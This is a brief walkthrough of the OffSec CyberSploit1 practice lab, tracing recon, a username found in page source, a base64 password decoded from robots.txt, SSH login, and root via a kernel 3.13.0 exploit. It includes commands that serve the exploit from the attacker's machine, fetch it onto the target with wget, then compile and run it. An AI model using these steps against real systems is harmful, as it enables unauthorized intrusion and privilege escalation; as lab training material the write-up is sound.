CyberSploit1 | OffSec Writeup

Cybersploit-1 is a popular lab from Offensive Security (OffSec) designed to help users improve their penetration testing skills. This lab typically involves various stages of penetration testing, including information gathering, vulnerability analysis, exploitation, and post-exploitation.

Use Rustscan scripts or other tools to gather more information about the services running on open ports:

After finding the webpage, I went to the website directly:

I checked the source code.I found the username while reviewing the source code.Username:itsskv

I tried gobuster and found the hidden directory.

/Robots.txt

I found the password hash here: Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

Hash cracked by cyberchef .CyberChef (gchq.github.io)

So Username : itsskv & Password : cybersploit{youtube.com/c/cybersploit}

Lets connect to SSH with the command ssh itsskv@ 192.168.169.92

1st Flag

ROOT

"Now, let's find a way to gain root access. To do this, we need to identify a vulnerability in the machine. We'll start by checking the Linux Kernel version using the command uname -a, which reveals that the machine is running Linux version 3.13.0.

searchsploit Linux 3.13.0

Downloads from Exploit DB.

o now we know the vulnerability so next we need to download the exploit file for this vulnerability from Exploit-DB so that we can gain root access .Downloads local machine and transfer file lab machine.

Run Command 
python -m http.server 80        

lab machine run this command: Here use your vpn ip {tun0} and file name

wget https://192.168.45.211:80/ofs.c        

Then run this command: Here your file name

first: gcc ofs.c -o ofs
second: ./ofs        

Now you got the root.

cd /root        

cat proof.txt        

Happy Hacking: